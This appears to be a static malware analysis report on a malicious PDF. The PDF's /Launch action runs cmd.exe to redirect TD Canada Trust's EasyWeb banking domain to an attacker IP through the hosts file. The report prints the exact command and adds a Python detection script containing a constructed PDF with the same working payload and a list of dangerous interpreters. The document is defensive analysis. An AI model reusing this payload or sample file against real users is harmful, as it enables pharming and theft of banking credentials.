Malicious PDF — malware analysis report

Static analysis result for SHA-256 534de7f0fe574218…

Verdict: MALICIOUS
File type: PDF
Size: 1.2 KB
MD5: 69dc1dd84d2fc33dba0fa0d2557efda1
SHA-1: 045586f7666461c1c4ce9d8f38a98d7e598d1ae4
SHA-256: 534de7f0fe5742189be10924dcd32d391dd4064591b0a03afcbc65012f68eb98
Risk score: 120

Malware Insights

MITRE ATT&CK
T1204.002 User Execution: Malicious File; T1059.003 Command and Scripting Interpreter: Windows Command Shell

The PDF carries a /Launch action that starts cmd.exe. The command appends a line to the Windows hosts file that maps easyweb.tdcanadatrust.com (TD Canada Trust's EasyWeb online-banking domain) to 125.234.32.58. That is a public, attacker-controlled address, not a local one: once the entry is in place, the legitimate domain typed into any browser on the machine resolves to the attacker's server, which can present a look-alike login page and harvest banking credentials (pharming, with no need to get the victim to click a bad link). The document body reinforces this by instructing the user to copy and paste the domain into their browser. The French sentence at the end of the command parameters, "Cliquez sur "Open/Ouvrir" pour visualiser ce document!" ("Click "Open" to view this document!"), is not a separate dialog string: Adobe Reader shows the /Launch parameters in its confirmation prompt, so the attacker padded the command with a benign-looking instruction to coax the user into clicking Open. Because cmd.exe strips the redirection wherever it appears on the line, that padding is echoed into the hosts file too; the mapping sits in the first two fields of the appended line. Two caveats for triage: the append only succeeds when the reader process can write to %SystemRoot%\System32\drivers\etc\hosts, i.e. when it runs with administrative rights, and current Adobe Reader builds block /Launch of executables by default, so this sample is most dangerous on older or loosely configured readers.

Heuristics (2)

  • Launch action (critical) PDF_LAUNCH
    The PDF contains a /Launch action whose target is an executable, URL, or UNC path; opening the document can start an external application.
  • /Launch action target: cmd.exe (critical) PDF_LAUNCH_COMMAND
    The /Launch action specifies an executable target (cmd.exe) with the parameters '/c echo 125.234.32.58 easyweb.tdcanadatrust.com>> C:\Windows\System32\drivers\etc\hosts Cliquez sur "Open/Ouvrir" pour visualiser ce document!' (the trailing French reads "Click "Open" to view this document!"). cmd.exe is a known-dangerous target, as are PowerShell, the script hosts and similar interpreters.
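As an added example (not code from the report or from the analysis service), the following Python script reproduces the two heuristics above against a PDF given as raw bytes: it locates every /Launch action, pulls the /F target and /P parameters out of the PDF literal strings, tags the action PDF_LAUNCH and, for shell interpreters, PDF_LAUNCH_COMMAND, and then decodes a cmd.exe "echo IP hostname >> ...\drivers\etc\hosts" payload into the mapping it would write, flagging it when the hostname is pointed at a globally routable address. The embedded PDF is constructed for this example to reproduce the structure described in the report; it is not the analysed sample. The script handles only uncompressed, unobfuscated objects; the function and constant names are this example's own.

```python
"""Added example: static scan of PDF /Launch actions (constructed sample below)."""
import ipaddress
import re

# Interpreters/LOLBins that make a /Launch target "known dangerous".
DANGEROUS_EXECUTABLES = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}

# Constructed sample: the catalog's /OpenAction is a /Launch of cmd.exe.
# Inside a PDF literal string a backslash is an escape character, so every
# path backslash is doubled there (\\\\ in this Python literal -> \\ in the file).
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /Type /Action /S /Launch /Win << /F (cmd.exe)
/P (/c echo 125.234.32.58 easyweb.tdcanadatrust.com>> C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts Cliquez sur "Open/Ouvrir" pour visualiser ce document!) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}


def pdf_literal_string(data: bytes, start: int):
    """Decode the PDF literal string that opens at data[start] == b'('.

    Handles balanced nested parentheses and backslash escapes (octal escapes
    are not decoded).  Returns (decoded_text, index_after_closing_paren)."""
    if data[start:start + 1] != b"(":
        raise ValueError("not at a literal string")
    depth, i, out = 1, start + 1, bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":                      # escape: next byte taken literally
            nxt = data[i + 1:i + 2]         # unless it is one of n/r/t/b/f
            out += _ESCAPES.get(nxt, nxt)
            i += 2
            continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0:
                return out.decode("latin-1"), i + 1
        out += c
        i += 1
    raise ValueError("unterminated literal string")


_LAUNCH_RE = re.compile(rb"/S\s*/Launch\b")
_FILE_OR_PARAMS_RE = re.compile(rb"/(F|P)\s*\(")


def find_launch_actions(pdf: bytes):
    """Return [{'target': <F>, 'params': <P>}, ...] for every /Launch action.

    The enclosing object (from the preceding 'obj' to the next 'endobj') is
    scanned, so the key order inside the dictionary does not matter."""
    actions = []
    for m in _LAUNCH_RE.finditer(pdf):
        start = max(pdf.rfind(b" obj", 0, m.start()), 0)
        end = pdf.find(b"endobj", m.end())
        body = pdf[start:end if end != -1 else len(pdf)]
        rec = {"target": "", "params": ""}
        for k in _FILE_OR_PARAMS_RE.finditer(body):
            value, _ = pdf_literal_string(body, k.end() - 1)
            rec["target" if k.group(1) == b"F" else "params"] = value
        actions.append(rec)
    return actions


# cmd.exe syntax: 'echo <ip> <hostname> ... >> <...>\drivers\etc\hosts'
_HOSTS_APPEND_RE = re.compile(
    r"echo\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<host>[\w.-]+)"
    r"[^>]*>>?\s*(?P<path>\S*drivers\\etc\\hosts)", re.IGNORECASE)


def hosts_file_writes(params: str):
    """Decode hosts-file append payloads into (ip, hostname, pharming_flag).

    pharming_flag is True when the hostname is pointed at a globally routable
    address: traffic for that name leaves the machine for a server the
    attacker controls instead of being sinkholed at 127.0.0.1."""
    writes = []
    for m in _HOSTS_APPEND_RE.finditer(params):
        writes.append((m["ip"], m["host"].lower(), ipaddress.ip_address(m["ip"]).is_global))
    return writes


def scan(pdf: bytes):
    """Apply the two report heuristics to every /Launch action found in pdf."""
    findings = []
    for action in find_launch_actions(pdf):
        exe = action["target"].replace("\\", "/").rsplit("/", 1)[-1].lower()
        tags = ["PDF_LAUNCH"] if action["target"] else []
        if exe in DANGEROUS_EXECUTABLES:
            tags.append("PDF_LAUNCH_COMMAND")
        findings.append({"target": action["target"], "params": action["params"],
                         "tags": tags, "hosts_writes": hosts_file_writes(action["params"])})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_PDF):
        print(f["tags"], f["target"], f["params"])
        for ip, host, pharming in f["hosts_writes"]:
            print(f"  hosts entry: {host} -> {ip}  (public IP: {pharming})")
```

Real samples usually hide the action inside FlateDecode streams or object streams, or split the dictionary across indirect objects, so for triage of anything beyond a 1.2 KB sample like this one run a full PDF parser first and feed its decoded objects to this kind of check. On the endpoint side the same mapping is the hunt: any hosts-file line that points a banking domain at a non-loopback address is a finding regardless of how it got there.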